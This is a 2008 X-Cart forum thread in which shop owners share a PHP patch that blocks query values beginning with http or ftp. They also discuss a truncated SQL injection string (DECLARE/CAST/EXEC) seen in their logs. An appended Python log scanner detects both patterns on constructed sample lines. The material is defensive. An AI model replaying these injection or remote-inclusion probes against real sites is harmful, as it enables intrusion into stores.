X-Cart: shopping cart software

X-Cart forums (https://forum.x-cart.com/index.php)
-   Dev Questions (https://forum.x-cart.com/forumdisplay.php?f=20)
-   -   [PATCH] Blocking those pesky hackers (https://forum.x-cart.com/showthread.php?t=38748)

Scotty85 06-06-2008 11:11 AM

Re: [PATCH] Blocking those pesky hackers
 
I figured there had to be a way to make the part before the HTTP a wildcard of some kind. 8)

One more reason to learn more about PHP. I dabble enough to be dangerous and can reverse-engineer it with the best of them.... just don't fully get the syntax sometimes.

intel352 06-06-2008 11:15 AM

Re: [PATCH] Blocking those pesky hackers
 
won't be using a wildcard, will likely do a strpos() for the '=' sign, then explode() the value if it's there, and THEN use the substr() function to check for http, ftp, etc.

I'll leave you with that to see if you can piece together the solution in actual php :-)

Scotty85 06-06-2008 12:57 PM

Re: [PATCH] Blocking those pesky hackers
 
Heh.... I'm not THAT good... LOL


:D/

imexhouse 06-06-2008 08:30 PM

Re: [PATCH] Blocking those pesky hackers
 
3 Attachment(s)
Here are the two patches plus the sql file for 4.0.x
I tested them on my 4.0.19 and they're working fine.

intel352 06-07-2008 10:13 AM

Re: [PATCH] Blocking those pesky hackers
 
@imexhouse: thanks for your contribution!

Hi Scott, this should work:

PHP Code:

##
## Added for security purposes!
##
$stop_user = false;
// parse the raw query string into $_qs so every parameter value can be checked
parse_str($_SERVER['QUERY_STRING'], $_qs);
if ($_qs) {
    foreach ($_qs AS $k => $v) {
        // reject any parameter whose value starts with a URL scheme (http / ftp)
        if (substr($v, 0, 4) == 'http' || substr($v, 0, 3) == 'ftp') {
            // if the Stop List module is enabled, add the client IP to it
            if (!empty($active_modules["Stop_List"])) {
                func_add_ip_to_slist($REMOTE_ADDR, 'H');
            }
            $stop_user = true;
        }
    }
}


mltriebe 06-07-2008 10:30 AM

Re: [PATCH] Blocking those pesky hackers
 
Quote:

Originally Posted by intel352
@imexhouse: thanks for your contribution!

Hi Scott, this should work:

PHP Code:

##
## Added for security purposes!
##
$stop_user = false;
// parse the raw query string into $_qs so every parameter value can be checked
parse_str($_SERVER['QUERY_STRING'], $_qs);
if ($_qs) {
    foreach ($_qs AS $k => $v) {
        // reject any parameter whose value starts with a URL scheme (http / ftp)
        if (substr($v, 0, 4) == 'http' || substr($v, 0, 3) == 'ftp') {
            // if the Stop List module is enabled, add the client IP to it
            if (!empty($active_modules["Stop_List"])) {
                func_add_ip_to_slist($REMOTE_ADDR, 'H');
            }
            $stop_user = true;
        }
    }
}


Where does this code go, in the auth.php file?

Thanks, Mike

intel352 06-07-2008 10:44 AM

Re: [PATCH] Blocking those pesky hackers
 
1 Attachment(s)
Hi Mike, yes, it replaces *some* of the code that you would have already added, using the patch file.

So nothing gets confused in copy/paste, here's an updated patch file.

EDIT: if you want to use the patch file via X-Cart admin, you'll need to reverse the previous patch (by uploading it to Patch/Upgrade and selecting "yes" for Reverse).
Then you'll need to apply this patch.

Cheers

Scotty85 08-10-2008 07:30 AM

Re: [PATCH] Blocking those pesky hackers
 
I started getting these URLs in the Users Online log. Is there a way I can block these too?

HTML Code:

.../home.php?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(...%20AS%20CHAR(4000));EXEC(@S);

clik 08-10-2008 05:23 PM

Re: [PATCH] Blocking those pesky hackers
 
I've been getting the same code in my logs (;DECLARE%20@S%20CHAR(4000); ....). I did some research: http://isc.sans.org/diary.html?storyid=4844

timbrrr 08-17-2008 08:11 AM

Re: [PATCH] Blocking those pesky hackers
 
Noticing a lot of these too... anyone got a good solution to block these? They appear to be coming from many different IP addresses, so individual IP blocks would be impractical.
Even if they aren't getting in, it would be good to have a way to deflect them before they do figure out a way in.

/?';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST%20AS%20 CHAR(4000));ExEC(@S);............................. ...........................

(there's about 1200 characters total according to a text editor that I pasted it into that does character count.)
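Detection logic for both patterns discussed in this thread, as an added example that is not code from the thread or from X-Cart: it reproduces intel352's check (any parameter value starting with http or ftp, here made case-insensitive and matched on the full scheme) and adds the DECLARE/CAST/EXEC query string the later posts ask about, then runs both over a few constructed access-log lines. It is written in Python rather than PHP so it can be pointed at a log file offline; the IP addresses, paths and the hex value 0x414243 are constructed placeholders.

```python
# Added example, not code from the thread or from X-Cart.
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qsl, unquote_plus

# URL schemes rejected at the start of any parameter value (intel352's check,
# made case-insensitive and anchored on the full scheme).
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

# The CHAR(4000) / CAST / EXEC query string quoted later in the thread.
CAST_EXEC_RE = re.compile(
    r"declare\s+@\w+\s+n?char\(\d+\)\s*;\s*set\s+@\w+\s*=\s*cast\("
    r".*?as\s+n?char\(\d+\)\)\s*;\s*exec\(@\w+\)",
    re.IGNORECASE | re.DOTALL,
)

def classify_query(query: str) -> Optional[str]:
    """Return 'cast_exec', 'remote_url' or None for a raw query string."""
    # The injection is not key=value shaped, so test the decoded string whole.
    if CAST_EXEC_RE.search(unquote_plus(query)):
        return "cast_exec"
    # keep_blank_values so "?file=" style probes are still inspected
    for _key, value in parse_qsl(query, keep_blank_values=True):
        if value.lower().startswith(REMOTE_SCHEMES):
            return "remote_url"
    return None

# Combined-log-format request line: client IP, then the quoted request.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<path>\S+)')

def scan_log(text: str) -> List[Tuple[str, str]]:
    """Return (client_ip, verdict) for every log line whose query matched."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        _path, _sep, query = m.group("path").partition("?")
        verdict = classify_query(query)
        if verdict:
            hits.append((m.group("ip"), verdict))
    return hits

# Constructed log lines (RFC 5737 test addresses, placeholder hex 0x414243).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Aug/2008:07:30:00 -0800] "GET /home.php?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x414243%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 512
203.0.113.6 - - [10/Aug/2008:07:31:00 -0800] "GET /cart.php?mode=add&productid=42 HTTP/1.1" 200 2048
203.0.113.7 - - [10/Aug/2008:07:32:00 -0800] "GET /home.php?file=http://203.0.113.99/r.txt HTTP/1.1" 200 512
"""
```

Running `scan_log(SAMPLE_LOG)` flags the first and third lines and leaves the ordinary cart request alone; the flagged IPs are what you would feed to the Stop List or a firewall rule.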
